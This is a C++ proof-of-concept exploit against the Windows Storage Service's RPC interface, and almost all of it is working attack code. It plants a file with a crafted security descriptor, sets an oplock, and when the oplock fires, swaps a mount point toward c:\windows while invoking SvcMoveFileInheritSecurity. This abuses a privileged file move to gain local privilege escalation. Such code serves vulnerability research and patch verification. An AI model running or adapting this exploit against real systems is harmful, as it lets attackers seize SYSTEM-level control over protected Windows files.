// PocStorSvc.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include "rpc_h.h"
#include "FileOpLock.h"
#include "ReparsePoint.h"
#include <string>
#include <sddl.h>

#pragma comment(lib, "rpcrt4.lib")

RPC_STATUS CreateBindingHandle(RPC_BINDING_HANDLE *binding_handle)
{
	RPC_STATUS status;
	RPC_BINDING_HANDLE v5;
	RPC_SECURITY_QOS SecurityQOS = {};
	RPC_WSTR StringBinding = nullptr;
	RPC_BINDING_HANDLE Binding;

	StringBinding = 0;
	Binding = 0;
	status = RpcStringBindingComposeW(L"be7f785e-0e3a-4ab7-91de-7e46e443be29", L"ncalrpc", 
		nullptr, nullptr, nullptr, &StringBinding);
	if (status == RPC_S_OK)
	{
		status = RpcBindingFromStringBindingW(StringBinding, &Binding);
		RpcStringFreeW(&StringBinding);
		if (!status)
		{
			SecurityQOS.Version = 1;
			SecurityQOS.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE;
			SecurityQOS.Capabilities = RPC_C_QOS_CAPABILITIES_DEFAULT;
			SecurityQOS.IdentityTracking = RPC_C_QOS_IDENTITY_STATIC;

			status = RpcBindingSetAuthInfoExW(Binding, 0, 6u, 0xAu, 0, 0, (RPC_SECURITY_QOS*)&SecurityQOS);
			if (!status)
			{
				v5 = Binding;
				Binding = 0;
				*binding_handle = v5;
			}
		}
	}

	if (Binding)
		RpcBindingFree(&Binding);
	return status;
}

extern "C" void __RPC_FAR * __RPC_USER midl_user_allocate(size_t len)
{
	return(malloc(len));
}

extern "C" void __RPC_USER midl_user_free(void __RPC_FAR * ptr)
{
	free(ptr);
}

#define SOURCE_DIR L"c:\\src"
#define SOURCE_FILE SOURCE_DIR L"\\test.txt"
#define DEST_DIR L"c:\\dest"
#define DEST_FILE DEST_DIR L"\\test.txt"
#define DUMMY_DIR L"c:\\dummy"
#define DUMMY_FILE DUMMY_DIR L"\\test.txt"

void OplockCallback()
{
	printf("Oplock triggered\n");
	printf("Setting Mount Point: %d\n", ReparsePoint::CreateMountPoint(SOURCE_DIR, L"\\??\\c:\\windows", L"Hello"));
}

void RunExploit()
{
	RPC_BINDING_HANDLE handle;
	RPC_STATUS status = CreateBindingHandle(&handle);
	if (status != RPC_S_OK)
	{
		printf("Error creating handle %d\n", status);
		return;
	}

	RpcTryExcept
	{
		printf("Result: %d\n", SvcMoveFileInheritSecurity(handle, SOURCE_FILE, DEST_FILE, 0));
	}
		RpcExcept(1)
	{
		ULONG ulCode = RpcExceptionCode();
		printf("Run time reported exception 0x%lx = %ld\n",
			ulCode, ulCode);
	}
	RpcEndExcept
}

int main()
{
	DeleteFile(SOURCE_FILE);
	RemoveDirectory(SOURCE_DIR);
	DeleteFile(DEST_FILE);
	RemoveDirectory(DEST_DIR);
	DeleteFile(DUMMY_FILE);
	RemoveDirectory(DUMMY_DIR);
	CreateDirectory(SOURCE_DIR, nullptr);
	CreateDirectory(DEST_DIR, nullptr);
	CreateDirectory(DUMMY_DIR, nullptr);
	if (!ReparsePoint::CreateMountPoint(SOURCE_DIR, L"\\??\\" DUMMY_DIR, L""))
	{
		printf("Error creating first mount point\n");
		return 1;
	}

	SECURITY_ATTRIBUTES sa = {};
	sa.nLength = sizeof(sa);
	ConvertStringSecurityDescriptorToSecurityDescriptor(L"D:(D;;WD;;;SY)(A;;GA;;;WD)", SDDL_REVISION_1, &sa.lpSecurityDescriptor, nullptr);
	HANDLE handle = CreateFile(SOURCE_FILE, GENERIC_ALL, 0, &sa, CREATE_ALWAYS, 0, nullptr);
	if (handle == INVALID_HANDLE_VALUE)
	{
		printf("Error creating dummy file %d\n", GetLastError());
		return 1;
	}

	DWORD written;
	WriteFile(handle, "Hello\r\n", 7, &written, nullptr);
	CloseHandle(handle);

	auto oplock = std::unique_ptr<FileOpLock>(FileOpLock::CreateLock(SOURCE_FILE, L"x", OplockCallback));
	RunExploit();
    return 0;
}

